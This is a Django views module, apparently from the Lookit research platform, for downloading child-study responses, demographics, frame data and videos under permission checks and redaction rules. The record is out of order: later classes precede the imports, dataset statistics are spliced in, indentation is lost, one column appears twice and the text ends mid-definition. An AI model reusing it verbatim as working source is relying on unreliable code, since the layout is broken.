        context["n_responses"] = study.responses_for_researcher(user).count()
        context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
        # Permission flags controlling which download/delete options the template shows.
        for key, perm in (
            ("can_delete_preview_data", StudyPermission.DELETE_ALL_PREVIEW_DATA),
            ("can_view_regular_responses", StudyPermission.READ_STUDY_RESPONSE_DATA),
            ("can_view_preview_responses", StudyPermission.READ_STUDY_PREVIEW_DATA),
        ):
            context[key] = user.has_study_perms(perm, study)
        return context
class StudyDeletePreviewResponses(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    SingleObjectMixin,
    View,
):
    """Handles the 'delete all preview data' button on the all-responses view."""

    queryset = Study.objects.all()

    def user_can_delete_preview_data(self):
        """Permission check: researcher with DELETE_ALL_PREVIEW_DATA on this study."""
        user = self.request.user
        study = self.get_object()
        return user.is_researcher and user.has_study_perms(
            StudyPermission.DELETE_ALL_PREVIEW_DATA, study
        )

    test_func = user_can_delete_preview_data

    def post(self, request, *args, **kwargs):
        """
        Post method on all responses view handles the 'delete all preview data' button.
        """
        study = self.get_object()
        # Note: delete all, not just consented!
        preview_responses = study.responses.filter(is_preview=True).prefetch_related(
            "videos", "responselog_set", "consent_rulings", "feedback"
        )
        # BUG FIX: previously this walked Paginator pages 1..N while deleting rows.
        # Each paginator.page(n) re-queries with a fixed OFFSET, so after deleting
        # page 1 the remaining rows shift forward and whole batches were skipped.
        # Instead, repeatedly delete the current first RESPONSE_PAGE_SIZE rows
        # until none remain. Per-object delete() is kept deliberately so the
        # pre_delete hook removes each video from S3.
        while True:
            batch = list(preview_responses[:RESPONSE_PAGE_SIZE])
            if not batch:
                break
            for resp in batch:
                # response logs, consent rulings, feedback, videos will all be deleted
                # via cascades - videos will be removed from S3 also on pre_delete hook
                resp.delete()
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs={"pk": study.id})
        )
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads all study responses in JSON format.
    """
    # Smaller pagination because individual responses may be large and we don't want the json representing 100
    # responses in memory
    paginate_by = 1
    def make_chunk(self, paginator, page_num, header_options):
        """Render one paginator page as a piece of the overall JSON array: opens
        the array on page 1, closes it on the final page, and separates
        responses with ",\\n" otherwise."""
        chunk = ""
        if page_num == 1:
            chunk = "[\n"
        chunk += ",\n".join(
            json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",  # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
                default=str,
            )
            for resp in paginator.page(page_num)
        )
        if page_num == paginator.page_range[-1]:
            chunk += "\n]"
        else:
            chunk += ",\n"
        return chunk
    def render_to_response(self, context, **response_kwargs):
        """Stream the JSON array page-by-page via StreamingHttpResponse to bound memory."""
        paginator = context["paginator"]
        study = self.study
        header_options = set(self.request.GET.getlist("data_options"))
        # Suffix "-identifiable" when any requested optional column is identifying.
        filename = "{}_{}.json".format(
            study_name_for_files(study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
        )
        response = StreamingHttpResponse(
            (
                self.make_chunk(paginator, page_num, header_options)
                for page_num in paginator.page_range
            ),
            content_type="text/json",
        )
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads a summary of all study responses in CSV format.
    """
    def render_to_response(self, context, **response_kwargs):
        """Build one CSV row per response (page-by-page), accumulating the union of
        headers across responses, then serve the whole file as an attachment."""
        paginator = context["paginator"]
        study = self.study
        headers = set()
        session_list = []
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = flatten_dict(
                    {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
                )
                # Add any new headers from this session
                headers = headers | row_data.keys()
                session_list.append(row_data)
        header_options = set(self.request.GET.getlist("data_options"))
        header_list = get_response_headers(header_options, headers)
        output, writer = csv_dict_output_and_writer(header_list)
        writer.writerows(session_list)
        cleaned_data = output.getvalue()
        # Suffix "-identifiable" when any requested optional column is identifying.
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
    """
    Hitting this URL downloads a data dictionary for the study response summary in CSV format. Does not depend on actual response data.
    """

    def build_summary_dict_csv(self, optional_headers_selected_ids):
        """
        Builds CSV file contents for data dictionary corresponding to the overview CSV
        """
        descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
        rows = [
            {"column": header, "description": descriptions[header]}
            for header in get_response_headers(
                optional_headers_selected_ids, descriptions.keys()
            )
        ]
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(rows)
        return output.getvalue()

    def get(self, request, *args, **kwargs):
        """Serve the data dictionary as <study>_all-responses-dict.csv."""
        header_options = self.request.GET.getlist("data_options")
        csv_text = self.build_summary_dict_csv(header_options)
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-responses-dict"
        )
        response = HttpResponse(csv_text, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads a summary of all children who participated in CSV format.
    """

    def render_to_response(self, context, **response_kwargs):
        """Build one CSV row per unique child (first response seen wins) and serve
        it as an attachment. Output is identifiable (includes child global IDs)."""
        paginator = context["paginator"]
        study = self.study
        # PERF: membership was previously tested against a list (O(n) per response,
        # O(n^2) overall); a set gives O(1) lookups with identical output.
        seen_child_ids = set()
        session_list = []
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = flatten_dict(
                    {
                        col.id: col.extractor(resp)
                        for col in RESPONSE_COLUMNS
                        if col.id in CHILD_CSV_HEADERS
                    }
                )
                # Only include one row per child, from their first response seen.
                if row_data["child__global_id"] not in seen_child_ids:
                    seen_child_ids.add(row_data["child__global_id"])
                    session_list.append(row_data)
        output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
        writer.writerows(session_list)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-children-identifiable"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
    """
    Hitting this URL downloads a data dictionary in CSV format for the summary of children who participated.
    Does not depend on actual response data.
    TODO: separate from response data mixin
    """

    def build_child_dict_csv(self):
        """
        Builds CSV file contents for data dictionary for overview of all child participants
        """
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(
            {"column": col.id, "description": col.description}
            for col in RESPONSE_COLUMNS
            if col.id in CHILD_CSV_HEADERS
        )
        return output.getvalue()

    def get(self, request, *args, **kwargs):
        """Serve the child-summary data dictionary as <study>_all-children-dict.csv."""
        csv_text = self.build_child_dict_csv()
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-children-dict"
        )
        response = HttpResponse(csv_text, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
    """Hitting this URL downloads a ZIP file with frame data from one response per file in CSV format"""
    # TODO: with large files / many responses generation can take a while. Should generate asynchronously along
    # with the data dict.
    def render_to_response(self, context, **response_kwargs):
        """Build an in-memory ZIP with one frame-data CSV per response and serve it.
        External studies have no frame data, so redirect with an error instead."""
        paginator = context["paginator"]
        study = self.study
        if study.study_type.is_external:
            messages.error(
                self.request, "Frame data is not available for External Studies."
            )
            return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))
        zipped_file = io.BytesIO()  # import io
        with zipfile.ZipFile(zipped_file, "w", zipfile.ZIP_DEFLATED) as zipped:
            for page_num in paginator.page_range:
                page_of_responses = paginator.page(page_num)
                for resp in page_of_responses:
                    data = build_single_response_framedata_csv(resp)
                    # One entry per response: <study>_<response-uuid>_frames.csv
                    filename = "{}_{}_{}.csv".format(
                        study_name_for_files(study.name), resp.uuid, "frames"
                    )
                    zipped.writestr(filename, data)
        # Rewind so FileResponse streams the archive from the beginning.
        zipped_file.seek(0)
        response = FileResponse(
            zipped_file,
            as_attachment=True,
            filename="{}_framedata_per_session.zip".format(
                study_name_for_files(study.name)
            ),
        )
        return response
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
    """
    Hitting this URL queues creation of a template data dictionary for frame-level data in CSV format.
    The file is put on GCP and a link is emailed to the user.
    """
    def get(self, request, *args, **kwargs):
        """Kick off asynchronous dictionary generation (Celery task) and redirect
        back to the all-responses page with a status message."""
        study = self.study
        if study.study_type.is_external:
            messages.error(
                request, "Frame data dictionary is not available for external studies"
            )
        else:
            filename = "{}_{}_{}".format(
                study_name_for_files(study.name), study.uuid, "all-frames-dict"
            )
            # .delay() queues the task; the user is emailed a link when it finishes.
            build_framedata_dict.delay(filename, study.uuid, self.request.user.uuid)
            messages.success(
                request,
                f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs=self.kwargs)
        )
class StudyDemographics(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """
    StudyDemographics view shows participant demographic snapshots associated
    with each response to the study
    """

    template_name = "studies/study_demographics.html"
    queryset = Study.objects.all()

    def get_context_data(self, **kwargs):
        """
        Adds information for displaying how many and which types of responses are available.
        """
        context = super().get_context_data(**kwargs)
        user = self.request.user
        study = context["study"]
        context["n_responses"] = study.responses_for_researcher(user).count()
        context["can_view_regular_responses"] = user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, study
        )
        context["can_view_preview_responses"] = user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, study
        )
        return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads all participant demographics in JSON format.
    """
    def render_to_response(self, context, **response_kwargs):
        """Serialize each response's demographic snapshot (page-by-page) and serve
        the lot as one JSON array attachment."""
        study = self.study
        header_options = self.request.GET.getlist("demo_options")
        json_responses = []
        paginator = context["paginator"]
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                json_responses.append(
                    json.dumps(
                        construct_response_dictionary(
                            resp,
                            DEMOGRAPHIC_COLUMNS,
                            header_options,
                            include_exp_data=False,
                        ),
                        indent="\t",
                        default=str,
                    )
                )
        # Assemble the individually-serialized objects into a JSON array.
        cleaned_data = f"[ {', '.join(json_responses)} ]"
        filename = "{}_{}.json".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(cleaned_data, content_type="text/json")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads all participant demographics in CSV format.
    """
    def render_to_response(self, context, **response_kwargs):
        """Build one CSV row per response's demographic snapshot and serve the
        file as an attachment, using only the headers selected via demo_options."""
        study = self.study
        paginator = context["paginator"]
        header_options = set(self.request.GET.getlist("demo_options"))
        participant_list = []
        headers_for_download = get_demographic_headers(header_options)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
                participant_list.append(row_data)
        output, writer = csv_dict_output_and_writer(headers_for_download)
        writer.writerows(participant_list)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads a data dictionary for participant demographics in in CSV format.
    Does not depend on any actual data.
    """
    def render_to_response(self, context, **response_kwargs):
        """Emit a column/description CSV covering only the demographic headers
        selected via demo_options."""
        header_options = set(self.request.GET.getlist("demo_options"))
        headers_for_download = get_demographic_headers(header_options)
        all_descriptions = [
            {"column": col.id, "description": col.description}
            for col in DEMOGRAPHIC_COLUMNS
            if col.id in headers_for_download
        ]
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(all_descriptions)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
    """
    Hitting this URL checks for collisions among all child and account hashed IDs, and returns a string describing
    any collisions (empty string if none).
    """
    def get(self, request, *args, **kwargs):
        """Scan all consented responses, mapping hashed participant/child IDs back
        to global UUIDs; report any hashed ID that maps to two different UUIDs.
        Returns JSON {"collisions": <description string, empty if none>}."""
        study = self.study
        responses = (
            study.consented_responses.order_by("id")
            .select_related("child", "child__user", "study")
            .values(
                "uuid",
                "child__uuid",
                "child__user__uuid",
                "study__uuid",
                "study__salt",
                "study__hash_digits",
            )
        )
        child_dict = {}
        account_dict = {}
        collision_text = ""
        # Note: could also just check number of unique global vs. hashed IDs in full dataset;
        # only checking one-by-one for more informative output.
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                participant_hashed_id = hash_participant_id(resp)
                participant_global_id = resp["child__user__uuid"]
                child_hashed_id = hash_child_id(resp)
                child_global_id = resp["child__uuid"]
                if participant_hashed_id in account_dict:
                    if participant_global_id != account_dict[participant_hashed_id]:
                        # NOTE(review): participant entries end in "\n" but child
                        # entries (below) end in "<br>" - confirm which delimiter
                        # the consumer of this JSON expects and unify.
                        collision_text += "Participant hashed ID {} ({}, {})\n".format(
                            participant_hashed_id,
                            account_dict[participant_hashed_id],
                            participant_global_id,
                        )
                else:
                    account_dict[participant_hashed_id] = participant_global_id
                if child_hashed_id in child_dict:
                    if child_global_id != child_dict[child_hashed_id]:
                        collision_text += "Child hashed ID {} ({}, {})<br>".format(
                            child_hashed_id,
                            child_dict[child_hashed_id],
                            child_global_id,
                        )
                else:
                    child_dict[child_hashed_id] = child_global_id
        return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
    """
    StudyAttachments View shows video attachments for the study
    """
    template_name = "studies/study_attachments.html"
    model = Video
    paginate_by = 100
    def get_ordering(self):
        # Default to newest-first; also guard against an empty ?sort= value.
        return self.request.GET.get("sort", "-created_at") or "-created_at"
    def get_queryset(self):
        """Fetches all consented videos this user has access to.
        Returns:
            QuerySet: all videos from this study where response has been marked as
            consented and response is of a type (preview/actual data) that user can view
        Todo:
            * use a helper (e.g. in queries) select_videos_for_user to fetch the
            appropriate videos here and in build_zipfile_of_videos - deferring for the moment
            to work out dependencies.
        """
        study = self.study
        videos = study.videos_for_consented_responses
        # Narrow to only preview or only actual data depending on which
        # permission(s) the user holds.
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, study
        ):
            videos = videos.filter(response__is_preview=True)
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, study
        ):
            videos = videos.filter(response__is_preview=False)
        # Optional substring filter on filename via ?match=.
        match = self.request.GET.get("match", "")
        if match:
            videos = videos.filter(full_name__icontains=match)
        return videos.order_by(self.get_ordering())
    def get_context_data(self, **kwargs):
        """
        In addition to the study, adds several items to the context dictionary. Study results
        are paginated.
        """
        context = super().get_context_data(**kwargs)
        context["match"] = self.request.GET.get("match", "")
        context["study"] = self.study
        return context
    def post(self, request, *args, **kwargs):
        """
        Queues asynchronous generation of a zip archive of study videos (all
        videos, consent videos, or both, depending on which buttons were posted);
        the user is emailed a download link when each archive is ready.
        """
        match = self.request.GET.get("match", "")
        study = self.study
        if self.request.POST.get("all-attachments"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=False,
            )
            messages.success(
                request,
                f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        if self.request.POST.get("all-consent-videos"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_consent_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=True,
            )
            messages.success(
                request,
                f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-attachments", kwargs=self.kwargs)
        )
| 40.529175 | 135 | 0.624957 | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
    """Declarative spec for one column of downloadable response/demographic data.

    Instances populate the RESPONSE_COLUMNS and DEMOGRAPHIC_COLUMNS tables below;
    downstream code uses them to build CSV/JSON downloads and data dictionaries.
    """

    # Column header ID used in downloads and the data-options form, e.g. "response__uuid"
    id: str
    # Human-readable explanation of the column, included in data dictionary files
    description: str
    # Pulls this column's value from a Response instance (or, for demographic
    # columns, from a Response values dict)
    extractor: Callable[
        [Union[Response, Dict]], Union[str, List]
    ]
    # Whether the researcher may include/omit this column when downloading
    optional: bool = False
    # Display name shown in the response summary UI (may be blank)
    name: str = ""
    # For optional columns: whether the download form pre-selects this column
    include_by_default: bool = False
    # Marks columns containing potentially identifying data (affects download filenames)
    identifiable: bool = False
RESPONSE_COLUMNS = [
ResponseDataColumn(
id="response__id",
description="Short ID for this response",
extractor=lambda resp: str(resp.id),
name="Response ID",
),
ResponseDataColumn(
id="response__uuid",
description="Unique identifier for response. Can be used to match data to video filenames.",
extractor=lambda resp: str(resp.uuid),
name="Response UUID",
),
ResponseDataColumn(
id="response__date_created",
description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
extractor=lambda resp: str(resp.date_created),
name="Date created",
),
ResponseDataColumn(
id="response__completed",
description=(
"Whether the participant submitted the exit survey; depending on study criteria, this may not align "
"with whether the session is considered complete. E.g., participant may have left early but submitted "
"exit survey, or may have completed all test trials but not exit survey."
),
extractor=lambda resp: resp.completed,
name="Completed",
),
ResponseDataColumn(
id="response__withdrawn",
description=(
"Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
"true, video will not be available and must not be used."
),
extractor=lambda resp: resp.withdrawn,
name="Withdrawn",
),
ResponseDataColumn(
id="response__parent_feedback",
description=(
"Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
"identifying or sensitive information depending on what parents say, so it should be scrubbed or "
"omitted from published data."
),
extractor=lambda resp: resp.parent_feedback,
name="Parent feedback",
),
ResponseDataColumn(
id="response__birthdate_difference",
description=(
"Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
"participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
"no birthdate available from the exit survey."
),
extractor=lambda resp: resp.birthdate_difference,
name="Birthdate difference",
),
ResponseDataColumn(
id="response__video_privacy",
description=(
"Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
"Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
"(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
"In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
"just after the consent form and did not complete the exit survey), you must treat the video as "
"private."
),
extractor=lambda resp: resp.privacy,
name="Video privacy level",
),
ResponseDataColumn(
id="response__databrary",
description=(
"Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
"treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
"authorized Databrary users."
),
extractor=lambda resp: resp.databrary,
name="Databrary sharing",
),
ResponseDataColumn(
id="response__is_preview",
description=(
"Whether this response was generated by a researcher previewing the experiment. Preview data should "
"not be used in any actual analyses."
),
extractor=lambda resp: resp.is_preview,
name="Preview",
),
ResponseDataColumn(
id="consent__ruling",
description=(
"Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indidate "
"informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
"consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
"e.g. has not been reviewed yet or waiting on parent email response')"
),
extractor=lambda resp: resp.most_recent_ruling,
),
ResponseDataColumn(
id="consent__arbiter",
description="Name associated with researcher account that made the most recent consent ruling",
extractor=lambda resp: resp.most_recent_ruling_arbiter,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="consent__comment",
description=(
"Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
"was confirmed by email)"
),
extractor=lambda resp: resp.most_recent_ruling_comment,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="study__uuid",
description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
extractor=lambda resp: str(resp.study.uuid),
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, which "
"may have unintended privacy consequences. Researchers can use this ID to match participants across "
"studies (subject to their own IRB review), but would need to generate their own random participant "
"IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
"only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp.child.user.uuid),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple responses "
"from a child and for siblings, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.user.uuid,
resp.study.uuid,
resp.study.salt,
resp.study.hash_digits,
),
name="Parent ID",
),
ResponseDataColumn(
id="participant__nickname",
description=(
"Nickname associated with the family account for this response - generally the mom or dad's name. "
"Must be redacted for publication."
),
extractor=lambda resp: resp.child.user.nickname,
optional=True,
name="Parent name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__global_id",
description=(
"Primary unique identifier for the child associated with this response. Will be the same for multiple "
"responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
"because this allows identification of children across different published studies, which may have "
"unintended privacy consequences. Researchers can use this ID to match participants across studies "
"(subject to their own IRB review), but would need to generate their own random participant IDs for "
"publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
"data from one Lookit study."
),
extractor=lambda resp: str(resp.child.uuid),
optional=True,
name="Child global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__hashed_id",
description=(
"Identifier for child associated with this response. Will be the same for multiple responses from a "
"child, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
),
name="Child ID",
),
ResponseDataColumn(
id="child__name",
description=(
"Nickname for the child associated with this response. Not necessarily a real name (we encourage "
"initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
"publication of data."
),
extractor=lambda resp: resp.child.given_name,
optional=True,
name="Child name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__birthday",
description=(
"Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
"age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
"participation)."
),
extractor=lambda resp: resp.child.birthday,
optional=True,
name="Birthdate",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_in_days",
description=(
"Age in days at time of response of child associated with this response, exact. This can be used in "
"conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
"to publication unless no timestamp information is shared."
),
extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
optional=True,
name="Age in days",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_rounded",
description=(
"Age in days at time of response of child associated with this response, rounded to the nearest 10 "
"days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
"you have more than a few sessions per participant it would be possible to infer the exact age in days "
"(and therefore birthdate) with some effort. In this case you might consider directly jittering "
"birthdates."
),
extractor=lambda resp: str(
round_age(int((resp.date_created.date() - resp.child.birthday).days))
)
if (resp.date_created and resp.child.birthday)
else "",
optional=True,
name="Rounded age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__gender",
description=(
"Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
"to answer)"
),
extractor=lambda resp: resp.child.gender,
optional=True,
name="Child gender",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__age_at_birth",
description=(
"Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
"'Under 24 weeks', or 'Not sure or prefer not to answer'"
),
extractor=lambda resp: resp.child.age_at_birth,
optional=True,
name="Child gestational age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__language_list",
description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.language_list,
optional=True,
name="Child languages",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__condition_list",
description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.condition_list,
optional=True,
name="Child conditions",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__additional_information",
description=(
"Free response 'anything else you'd like us to know' field on child registration form for child "
"associated with this response. Should be redacted or reviewed prior to publication as it may include "
"names or other identifying information."
),
extractor=lambda resp: resp.child.additional_information,
optional=True,
name="Child additional information",
include_by_default=True,
identifiable=True,
),
ResponseDataColumn(
id="response__sequence",
description=(
"Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
"Nth frame displayed during the session associated with this response. Responses may have different "
"sequences due to randomization or if a participant leaves early."
),
extractor=lambda resp: resp.sequence,
name="Response sequence",
),
ResponseDataColumn(
id="response__conditions",
description=(
"RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
"response_conditions.N.(...) fields give information about condition assignment during a particular "
"frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
"response_sequence) where the randomization occurred. Additional fields such as "
"response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
),
extractor=lambda resp: [
{**{"frameName": cond_frame}, **conds}
for (cond_frame, conds) in resp.conditions.items()
],
),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
DEMOGRAPHIC_COLUMNS = [
ResponseDataColumn(
id="response__uuid",
description=(
"Primary unique identifier for response. Can be used to match demographic data to response data "
"and video filenames; must be redacted prior to publication if videos are also published."
),
extractor=lambda resp: str(resp["uuid"]),
name="Response UUID",
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, "
"which may have unintended privacy consequences. Researchers can use this ID to match participants "
"across studies (subject to their own IRB review), but would need to generate their own random "
"participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
"alternative if only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp["child__user__uuid"]),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, but is unique to this study. This may be published "
"directly."
),
extractor=lambda resp: hash_participant_id(resp),
name="Participant ID",
),
ResponseDataColumn(
id="demographic__hashed_id",
description=(
"Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
"so may vary within the same participant across responses."
),
extractor=lambda resp: hash_demographic_id(resp),
name="Demographic ID",
),
ResponseDataColumn(
id="demographic__date_created",
description=(
"Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
"2019-10-02 21:39:03.713283+00:00"
),
extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
name="Date created",
),
ResponseDataColumn(
id="demographic__number_of_children",
